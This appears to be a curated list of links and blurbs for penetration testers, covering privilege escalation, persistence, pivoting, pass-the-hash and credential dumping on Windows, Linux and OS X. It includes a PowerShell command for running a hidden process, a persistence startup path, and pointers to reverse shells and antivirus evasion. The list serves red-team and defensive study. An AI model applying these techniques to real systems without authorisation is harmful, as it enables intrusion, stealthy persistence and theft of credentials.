##Privilege Escalation & Post-Exploitation
Learn how to hide your trojans, backdoors, etc from anti virus.
No one expect command execution!
- AD PowerShell Recon Scripts
Group Policy Preferences trick
Article Explaining what the KRBTGT account in AD is:
###General Privilege Escalation
Execute ShellCode Using Python
- In this article I am going to show you, how can we use python and its "ctypes" library to execute a "calc.exe" shell code or any other shell code.
###Privilege Escalation - Linux
Using the docker command to root the host (totally not a security issue)
- It is possible to do a few more things more with docker besides working with containers, such as creating a root shell on the host, overwriting system configuration files, reading restricted stuff, etc.
- Linux Exploit Suggester; based on operating system release number. This program run without arguments will perform a 'uname -r' to grab the Linux Operating Systems release version, and return a suggestive list of possible exploits. Nothing fancy, so a patched/back-ported patch may fool this script. Additionally possible to provide '-k' flag to manually enter the Kernel Version/Operating System Release Version.
Basic Linux Privilege Escalation - g0tmi1k
- Not so much a script as a resource, g0tmi1k’s blog post here has led to so many privilege escalations on Linux system’s it’s not funny. Would definitely recommend trying out everything on this post for enumerating systems.
- This tool is great at running through a heap of things you should check on a Linux system in the post exploit process. This include file permissions, cron jobs if visible, weak credentials etc. The first thing I run on a newly compromised system.
- This is a great tool for once again checking a lot of standard things like file permissions etc. The real gem of this script is the recommended privilege escalation exploits given at the conclusion of the script. This is a great starting point for escalation.
Unix Privilege Escalation Checker
- Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases). It is written as a single shell script so it can be easily uploaded and run (as opposed to un-tarred, compiled and installed). It can run either as a normal user or as root (obviously it does a better job when running as root because it can read more files).
###Privilege Escalation - Windows
Windows Privilege Escalation Fundamentals
Windows Exploit Suggester
Some forum posts on Win Priv Esc
PowerUp * PowerUp is a powershell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities.
Windows Privilege Escalation Cheat Sheet/Tricks
How to own any windows network with group policy hijacking attacks
Hacking windows through the WIndows API; delves into windows api, how it can break itself
Analyzing local privilege escalations in win32k
- This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.
Exploiting Windows 2008 Group Policy Preferences
Extreme Privelege Escalataion on Windows8 UEFI Systems
- Summary by stormehh from reddit: “In this whitepaper (and accompanying Defcon/Blackhat presentations), the authors demonstrate vulnerabilities in the UEFI "Runtime Service" interface accessible by a privileged userland process on Windows 8. This paper steps through the exploitation process in great detail and demonstrates the ability to obtain code execution in SMM and maintain persistence by means of overwriting SPI flash”
Old Privilege Escalation Techniques
- PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)
All roads lead to SYSTEM
Dump Windows password hashes efficiently - Part 1
###Privilege Escalation - OS X
Hidden backdoor API to root privileges in Apple OS X
Mac OS X local privilege escalation (IOBluetoothFamily)
Privilege Escalation on OS X below 10.0
File Server Triage on Red Team Engagements
Finding your external IP:
Simply curl any of the following addresses: ident.me, ifconfig.me or whatsmyip.akamai.com
Egress Buster Reverse Shell
- Egress Buster Reverse Shell – Brute force egress ports until one if found and execute a reverse shell(from trustedsec)
Determine Public IP from CLI
- PyBuild is a tool for automating the pyinstaller method for compiling python code into an executable. This works on Windows, Linux, and OSX (pe and elf formats)(From trustedsec)
[More on Using Bash's Built-in /dev/tcp File (TCP/IP)](http://www.linuxjournal.com/content/more-using-bashs-built-devtcp-file-tcpip More on Using Bash's Built-in /dev/tcp File (TCP/IP))
Dumping user passwords in plaintext on Windows 8.1 and Server 2012
PShell Script: Extract All GPO Set Passwords From Domain
- This script parses the domain’s Policies folder looking for Group.xml files. These files contain either a username change, password setting, or both. This gives you the raw data for local accounts and/or passwords enforced using Group Policy Preferences. Microsoft chose to use a static AES key for encrypting this password. How awesome is that!
Client Side attacks using Powershell
I Hunt Sysadmins 2.0
- It covers various ways to hunt for users in Windows domains, including using PowerView.
Abusing Active Directory in Post-Exploitation - Carlos Perez - Derbycon 2014
- Windows APIs are often a blackbox with poor documentation, taking input and spewing output with little visibility on what actually happens in the background. By reverse engineering (and abusing) some of these seemingly benign APIs, we can effectively manipulate Windows into performing stealthy custom attacks using previously unknown persistent and injection techniques. In this talk, we’ll get Windows to play with itself nonstop while revealing 0day persistence, previously unknown DLL injection techniques, and Windows API tips and tricks. To top it all off, a custom HTTP beaconing backdoor will be released leveraging the newly released persistence and injection techniques. So much Windows abuse, so little time.
15 Ways to bypass Powershell execution-policy settings
- Does what it says on the tin. Overall, its clear that execution-policy was not meant as a security method. Or if it was, someone was drinking a bit too much.
Post-Exploitation on Windows using ActiveX Controls
WMI Shell Tool
- The WMI shell tool that we have developed allows us to execute commands and get their output using only the WMI infrastructure, without any help from other services, like the SMB server. With the wmi-shell tool we can execute commands, upload files and recover Windows passwords remotely using only the WMI service available on port 135.
Dirty Powershell Webserver
[Dumping Windows Credentials](https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/
Dumping hashes from Active Directory for cracking
NTDSXtract - Active Directory Forensics Framework* Description from the page: This framework was developed by the author in order to provide the community with a solution to extract forensically important information from the main database of Microsoft Active Directory (NTDS.DIT).
Post exploitation trick - Phish users for creds on domains, from their own box
- Veil-PowerView is a powershell tool to gain network situational awareness on Windows domains. It contains a set of pure-powershell replacements for various windows "net *" commands, which utilize powershell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.
Egress Testing using PowerShell
Domain Trusts: Why You Should Care
Using Alternate Data Streams to Persist on a Compromised Machine
An Introduction to Backdooring Operating Systems for Fun and trolling - Defcon22
Windows Event Log Driven Backdoors
List of low-level attacks/persistence techniques. HIGHLY RECOMMENDED!
Windows Registry Persistence, Part 1: Introduction, Attack Phases and Windows Services
Temporal Persistence with bitsadmin and schtasks
Windows Event Log Driven Back Doors
COM Object hijacking: the discreet way of persistence
Thousand ways to backdoor a Windows domain (forest)
Windows Firewall Hook Enumeration
- We’re going to look in detail at Microsoft Windows Firewall Hook drivers from Windows 2000, XP and 2003. This functionality was leveraged by the Derusbi family of malicious code to implement port-knocking like functionality. We’re going to discuss the problem we faced, the required reverse engineering to understand how these hooks could be identified and finally how the enumeration tool was developed.
NTFS Alternate Data Streams for pentesters (part 1)
Windows task scheduler
How to start a hidden process?
Start-Process -WindowStyle hidden -FilePath “path-to-exe-to-be-hidden”
Windows Startup Application Database
Startup folder on Win8
- C:\Users\YOURUSER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Linux cron tab
What's the easiest way to have a script run at boot time in OS X? - Stack Overflow
Userland Persistence On Mac Os X "It Just Works" - Shmoocon 2015
- Got root on OSX? Do you want to persist between reboots and have access whenever you need it? You do not need plists, new binaries, scripts, or other easily noticeable techniques. Kext programming and kernel patching can be troublesome! Leverage already running daemon processes to guarantee your access. As the presentation will show, if given userland administrative access (read: root), how easy it is to persist between reboots without plists, non-native binaries, scripting, and kexts or kernel patching using the Backdoor Factory.
- socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals.
- Examples of use
Pivoting Ssh Reverse Tunnel Gateway
Portfwd - Pivot from within meterpreter
SSH Gymnastics and Tunneling with ProxyChains
SSH Cheat Sheet - pentestmonkey
Pivoting into a network using PLINK and FPipe
Reverse SSL backdoor with socat and metasploit (and proxies)
Pass-the-Hash is Dead: Long Live Pass-the-Hash
Still Passing the Hash 15 Years Later
pth-toolkit I.e Portable pass the hash toolkit
The Evolution of Protected Processes Part 1: Pass-the-Hash Mitigations in Windows 8.1
Et tu Kerberos - Christopher Campbell
PsExec and the Nasty Things It Can Do
- An overview of what PsExec is and what its capabilities are from an administrative standpoint.